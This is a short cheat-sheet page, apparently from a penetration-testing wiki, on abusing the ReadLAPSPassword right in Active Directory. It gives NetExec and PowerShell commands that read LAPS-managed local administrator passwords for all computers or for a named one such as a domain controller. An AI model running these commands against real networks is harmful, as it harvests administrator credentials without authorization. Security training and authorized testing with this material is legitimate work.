ReadLAPSPassword

Information

LAPS is a Windows feature that automatically manages and backs up the password of a local administrator account on Windows Server AD-joined devices

Exploitation

Linux

# read the password of all computers
nxc ldap <ip> -u <user> -p <pass> -M laps
# read the password of a specific computer
nxc ldap <ip> -u <user> -p <pass> -M laps -o COMPUTER='DC01$'

For an example of reading the LAPS password with NXC check Timelapse.

Windows

Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'

Resources

Last updated

Was this helpful?